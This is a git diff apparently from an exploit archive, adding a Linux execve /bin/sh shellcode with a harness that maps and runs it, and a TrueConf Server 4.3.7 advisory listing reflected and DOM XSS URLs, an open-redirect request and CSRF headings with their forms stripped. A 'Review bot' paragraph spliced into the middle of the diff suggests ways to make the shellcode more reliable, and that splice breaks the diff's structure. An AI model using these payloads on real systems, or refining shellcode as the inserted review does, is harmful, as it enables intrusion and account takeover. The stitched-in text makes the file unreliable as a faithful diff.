diff --git a/files.csv b/files.csv
index 886e1f94e..df9a65dbf 100644
--- a/files.csv
+++ b/files.csv
@@ -15853,6 +15853,7 @@ id,file,description,date,author,platform,type,port
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37114,3 +37115,4 @@ id,file,description,date,author,platform,type,port
 41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
 41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
 41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
+41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
diff --git a/platforms/linux/shellcode/41183.c b/platforms/linux/shellcode/41183.c
new file mode 100755
index 000000000..57d4b0c2b
--- /dev/null
+++ b/platforms/linux/shellcode/41183.c
@@ -0,0 +1,79 @@
+/**
+ Copyright © 2017 Odzhan. All Rights Reserved.
+
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions are
+ met:
+
+ 1. Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+
+ 2. Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in the
+ documentation and/or other materials provided with the distribution.
+
+ 3. The name of the author may not be used to endorse or promote products
+ derived from this software without specific prior written permission.
+
+ THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+ IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+ ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ POSSIBILITY OF SUCH DAMAGE.
*/
+
+#include
+#include
+#include
+
+#include
+
+#define SHX_SIZE 37
+
+char SHX[] = {
+ /* 0000 */ "\x31\xf6" /* xor esi, esi */
+ /* 0002 */ "\xf7\xe6" /* mul esi */
+ /* 0004 */ "\x52" /* push rdx */
+ /* 0005 */ "\x52" /* push rdx */
+ /* 0006 */ "\x52" /* push rdx */
+ /* 0007 */ "\x54" /* push rsp */
+ /* 0008 */ "\x5b" /* pop rbx */
+ /* 0009 */ "\x53" /* push rbx */
+ /* 000A */ "\x5f" /* pop rdi */
+ /* 000B */ "\xc7\x07\x2f\x62\x69\x6e" /* mov dword [rdi], 0x6e69622f */
+ /* 0011 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */
+ /* 0018 */ "\x40\x75\x04" /* jnz 0x1f */
+ /* 001B */ "\xb0\x3b" /* mov al, 0x3b */
+ /* 001D */ "\x0f\x05" /* syscall */
+ /* 001F */ "\x31\xc9" /* xor ecx, ecx */
+ /* 0021 */ "\xb0\x0b" /* mov al, 0xb */
+ /* 0023 */ "\xcd\x80" /* int 0x80 */
+};
+
+void xcode(char *s, int len)
+{
+ void *bin;
+
+ bin=mmap (0, len,
+ PROT_EXEC | PROT_WRITE | PROT_READ,
+ MAP_ANON | MAP_PRIVATE, -1, 0);
+
+ memcpy (bin, s, len);
+
+ // execute
+ ((void(*)())bin)();
+
+ munmap (bin, len);
+}
+
+int main(void)
+{
+ xcode (SHX, SHX_SIZE);
+ return 0;
+}
+
diff --git a/platforms/php/webapps/41184.txt b/platforms/php/webapps/41184.txt
new file mode 100755
index 000000000..11de71dc4
--- /dev/null
+++ b/platforms/php/webapps/41184.txt
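Review bot: The 64-bit path of `SHX` only falls through to `syscall` if ZF is still set by `xor esi, esi`, but the `mul esi` that follows leaves ZF architecturally undefined, so the mode switch at `\x40\x75\x04` (`inc eax` + `jnz` in 32-bit mode, a REX-prefixed `jnz` in 64-bit mode) rests on CPU-specific flag behaviour rather than anything the ISA promises — it evidently works where it was developed, but that is not a guarantee. Moving `\x31\xc9` (`xor ecx, ecx`) from offset 0x1F to directly before `\x40\x75\x04` (and updating the offset comments) fixes this at the same 37 bytes: in 64-bit mode ZF is then certainly set and execution reaches `syscall`, while in 32-bit mode `inc eax` clears it and the jump lands on `mov al, 0xb` with ecx already zero. Separately, `xcode` hands the `mmap` result to `memcpy` without testing for `MAP_FAILED`, so on a kernel or policy that refuses writable-and-executable anonymous mappings the harness segfaults instead of reporting why; add `if (bin == MAP_FAILED) { perror("mmap"); return; }` before the copy. Note also that `munmap` is effectively dead code: a successful execve replaces the process image, and a failed one runs off the end of the 37 bytes (there is no `ret`) into the zero-filled remainder of the mapping.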
@@ -0,0 +1,132 @@
+TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
+
+
+Vendor: TrueConf LLC
+Product web page: https://www.trueconf.com
+Affected version: 4.3.7.12255 and 4.3.7.12219
+
+Summary: TrueConf Server is a powerful, high-quality and highly secured
+video conferencing software server. It is specially designed to work with
+up to 250 participants in a multipoint conference over LAN or VPN networks.
+TrueConf Server requires no hardware and includes client applications for
+all popular platforms, making it an easy-to-set up, unified communications
+solution.
+
+Desc: The administration interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Input passed via the 'redirect_url' GET parameter is not properly verified before
+being used to redirect users. This can be exploited to redirect a user to an
+arbitrary website e.g. when a user clicks a specially crafted link to the affected
+script hosted on a trusted domain.
+
+TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
+input passed via several parameters to several scripts is not properly sanitized
+before being returned to the user. This can be exploited to execute arbitrary HTML
+and script code in a user's browser session in context of an affected site.
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Apache/2.4.17 (Win32)
+ PHP/5.4.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5393
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
+
+
+01.11.2016
+
+--
+
+
+CSRF Stored XSS:
+----------------
+
+
+
+
+ + + + + + + + + + + + + + + + +
+
+
+
+
+
+Reflected XSS:
+--------------
+
+http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=
+http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25
prompt(251)
+http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
+http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
+
+
+
+DOM XSS:
+--------
+
+http://127.0.0.1:8888/admin/group?'\>
+http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\">
+
+
+
+Open Redirect:
+--------------
+
+Request:
+
+GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
+Host: 127.0.0.1:8888
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+
+Response:
+
+HTTP/1.1 302 Found
+Date: Thu, 22 Sep 2016 21:15:40 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: http://www.zeroscience.mk
+Content-Length: 0
+Keep-Alive: timeout=5, max=75
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+
+
+CSRF Stop Web Service:
+----------------------
+
+
+
+
+ +
+ +